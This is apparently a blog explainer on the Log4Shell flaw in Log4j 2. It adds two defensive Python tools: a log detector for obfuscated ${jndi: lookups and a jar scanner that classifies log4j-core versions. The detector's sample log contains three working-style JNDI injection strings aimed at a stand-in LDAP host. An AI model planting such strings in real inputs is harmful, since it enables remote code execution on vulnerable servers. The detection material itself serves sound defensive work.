Log4j is a nearly omnipresent library across Java ecosystems. It is a logging library: it gives programmers a standard way to record what their software is doing, from routine status messages to error reports, which is why so many Java programs carry it. However, a vulnerability has recently been found in this library that has been making headlines. Let's talk about what it does, how scary it is, and whether you can stop it.
To keep things simple: the flaw, known as Log4Shell (CVE-2021-44228), lets an attacker take control of a machine remotely by getting it to run code of the attacker's choosing. The attacker needs no account and no special access. All they need is to get a specially crafted piece of text, a lookup string beginning with ${jndi:, into something the program writes to its log: a username, a web request header, a search term, a chat message. When an affected version of Log4j 2 logs that text, it treats it as a lookup, connects to the server named in the string and can load and run whatever code that server hands back. Critically, a bad actor has many ways of getting such text in front of a program, because any input that ends up in a log message is a potential route in, as long as that program runs on a JVM and logs through an affected Log4j 2 version.
As an example, it is possible to take control of a computer running a Minecraft server simply by typing the crafted text into the in-game chat, because the server writes chat messages to its log. The setup needed for that is, in the grand scheme of things, not hard at all.
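Because the attack rides on text that gets logged, the first thing defenders do is search their own logs for that text. The catch is that attackers quickly started hiding the ${jndi: string behind Log4j's own nesting tricks (${lower:j}, ${upper:J}, ${::-j}), so a plain search for "jndi" misses them. The following is an added example, not code from the original page or from the Log4j project: a small Python detector that first collapses those nesting forms and then looks for the lookup. The log lines and the 198.51.100.7 address are constructed for the example.

```python
import re
from typing import List, Tuple

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
_INNER = re.compile(r"\$\{([^${}]*)\}")

# What we are really looking for, once the obfuscation is peeled away.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(text: str, max_rounds: int = 32) -> str:
    """Collapse the nesting tricks used to hide '${jndi:'.

    Handled forms (all part of Log4j's own lookup syntax):
      ${lower:X}       -> x        ${upper:X} -> X
      ${anything:-DEF} -> DEF      e.g. ${::-j} -> j, ${env:NOPE:-j} -> j
    Lookups we do not resolve, such as ${jndi:...} or ${date:...}, are left
    in place, so the loop stops once only those remain.
    """
    for _ in range(max_rounds):
        changed = False

        def resolve(m: "re.Match[str]") -> str:
            nonlocal changed
            body = m.group(1)
            if ":-" in body:                       # default-value operator
                changed = True
                return body.split(":-", 1)[1]
            prefix, sep, rest = body.partition(":")
            if sep and prefix.strip().lower() == "lower":
                changed = True
                return rest.lower()
            if sep and prefix.strip().lower() == "upper":
                changed = True
                return rest.upper()
            return m.group(0)                      # unknown lookup: keep it

        text = _INNER.sub(resolve, text)
        if not changed:
            break
    return text


def is_jndi_probe(line: str) -> bool:
    """True if the line carries a JNDI lookup, obfuscated or not."""
    return bool(_JNDI.search(normalize(line)))


def find_jndi_probes(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line index, de-obfuscated line) for every suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        normalized = normalize(line)
        if _JNDI.search(normalized):
            hits.append((i, normalized))
    return hits


# Constructed sample web-server access log (not real traffic). The User-Agent
# field is the last quoted value; 198.51.100.0/24 is a documentation range.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:13:01:22 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:13:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:26 +0000] "GET /login HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:13:01:27 +0000] "GET /api HTTP/1.1" 200 9 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.7:1389/a}"',
    '10.0.0.3 - - [10/Dec/2021:13:02:00 +0000] "GET /search?q=${date:yyyy} HTTP/1.1" 200 77 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for idx, shown in find_jndi_probes(SAMPLE_LOG):
        print("line %d: %s" % (idx, shown))
```

Lines 1 to 3 are flagged and line 4, which contains a harmless ${date:yyyy} lookup, is not. Two caveats a practitioner should keep in mind: the normalizer only handles the three nesting forms shown, so new obfuscations need new rules, and a hit in your logs means someone tried, not that they succeeded. Whether they succeeded depends on the library version, which is the subject of the next section.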
Java is among the most popular software platforms in the world. Billions of devices worldwide run programs on JVMs without their owners realizing it, and a great many of those programs ship with this library inside them. It is very likely that something you use, or something you run, depends on an affected version. One nuance is worth stating: simply having Java installed is not the problem. The risk sits in applications that bundle Log4j 2 and log input that outsiders can influence, which in practice means servers and network-facing services first.
For this reason, the threat is to be taken very seriously. The ubiquity and popularity of the affected library make it highly dangerous, and explain why it has caused such a stir in the security community.
The answer to how to keep yourself safe is both refreshingly easy and deceptively difficult. Fixed releases of Log4j have been available since the vulnerability was disclosed (log4j-core 2.17.1 or later, with 2.12.4 for Java 7 and 2.3.2 for Java 6), so making sure everything you have is as up to date as possible is important. The catch is that Log4j is usually bundled inside each application rather than installed once on the machine, so every program has to be updated by its own developer, and not all software developers keep their programs on the cutting edge. Early workarounds such as the formatMsgNoLookups setting also turned out to be incomplete, so replacing the library itself is the only real fix.
For that reason, this vulnerability can linger for years, and quite possibly longer, including on your own machines: a vulnerable copy can sit inside a packaged application, a vendor appliance or a container image that nobody rebuilds, and a routine operating-system update will not touch it.
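Since the library hides inside each application, "am I up to date?" has to be answered by looking at what is actually on disk rather than at a package manager. The following is an added example, not code from the original page or from the Log4j project: a Python scanner that walks a directory, finds log4j-core jars (including ones nested inside fat jars and WARs), reads the version from the Maven metadata the jar carries, and checks whether the ${jndi:...} lookup class is still present. The fixture it builds, with its file names and contents, is constructed for the example and does not contain real Log4j code.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Tuple

# Maven metadata shipped inside every log4j-core jar.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# The class that performs ${jndi:...} lookups. Deleting it from the jar is the
# mitigation Apache published for cases where upgrading is impossible.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

Finding = Tuple[str, str, str]  # (path, version string, verdict)


def parse_version(text: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1). Qualifiers such as '-beta9' are ignored."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        raise ValueError("no version in %r" % text)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def classify(version: Tuple[int, int, int], has_jndi_class: bool) -> str:
    major, minor, patch = version
    if major < 2:
        return "log4j-1.x (not affected by the lookup bug, but end-of-life)"
    # The lookup bug affects 2.0-beta9 .. 2.14.1. It was fixed in 2.15.0,
    # with backports 2.12.2 (Java 7) and 2.3.1 (Java 6).
    fixed = (version >= (2, 15, 0)
             or (minor == 12 and patch >= 2)
             or (minor == 3 and patch >= 1))
    if not fixed and has_jndi_class:
        return "VULNERABLE"
    if not fixed:
        return "mitigated (JndiLookup.class removed) but should still be upgraded"
    # Follow-up fixes for the same code path landed in 2.17.1 / 2.12.4 / 2.3.2.
    current = (version >= (2, 17, 1)
               or (minor == 12 and patch >= 4)
               or (minor == 3 and patch >= 2))
    return "patched" if current else "patched for the lookup bug, but outdated"


def inspect_jar(zf: zipfile.ZipFile, path: str, findings: List[Finding]) -> None:
    names = set(zf.namelist())
    if POM_PROPS in names:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
        m = re.search(r"^version=(.+)$", props, re.M)
        if m:
            ver = m.group(1).strip()
            findings.append((path, ver, classify(parse_version(ver), JNDI_CLASS in names)))
    # Fat jars, Spring Boot jars and WARs carry their dependencies as nested
    # archives; those are exactly the copies a system update never touches.
    for name in names:
        if name.lower().endswith((".jar", ".war", ".ear")):
            with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                inspect_jar(inner, path + "!" + name, findings)


def scan(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith((".jar", ".war", ".ear")):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_jar(zf, full, findings)
                except zipfile.BadZipFile:
                    pass
    return sorted(findings)


def build_fixture() -> str:
    """Constructed sample tree: two log4j-core jars plus a fat jar nesting a
    third. Only the entries the scanner looks at are present."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    lib = os.path.join(root, "app", "lib")
    os.makedirs(lib)

    def core_jar(version: str, keep_jndi: bool = True) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                                   "artifactId=log4j-core\nversion=%s\n" % version)
            if keep_jndi:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
        return buf.getvalue()

    with open(os.path.join(lib, "log4j-core-2.14.1.jar"), "wb") as f:
        f.write(core_jar("2.14.1"))
    with open(os.path.join(lib, "log4j-core-2.17.1.jar"), "wb") as f:
        f.write(core_jar("2.17.1"))
    with zipfile.ZipFile(os.path.join(root, "app", "service.jar"), "w") as fat:
        fat.writestr("BOOT-INF/lib/log4j-core-2.12.1.jar", core_jar("2.12.1", keep_jndi=False))
    return root


if __name__ == "__main__":
    for path, ver, verdict in scan(build_fixture()):
        print("%-12s %s (%s)" % (verdict, path, ver))
```

Point scan() at a real application directory to use it for real. The verdict for the nested 2.12.1 copy shows the other half of the caveat: a jar from which JndiLookup.class has been deleted (the zip -d mitigation Apache published) is no longer exploitable through this bug, but it is still an old library that should be replaced. Two limitations: vendors who repackage Log4j under their own package name move the pom.properties path, so this scanner will miss them, and a jar whose metadata was stripped reports nothing at all. Treat "no findings" as "nothing found by this method", not as proof of safety.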
As always, be cautious about what software you choose to download and run on any of your machines, whether business, personal, mobile or desktop. There are certainly other security weaknesses in them that have not hit the mainstream, so making sure you only trust reputable sources, and that those sources actually ship updates, is vitally important.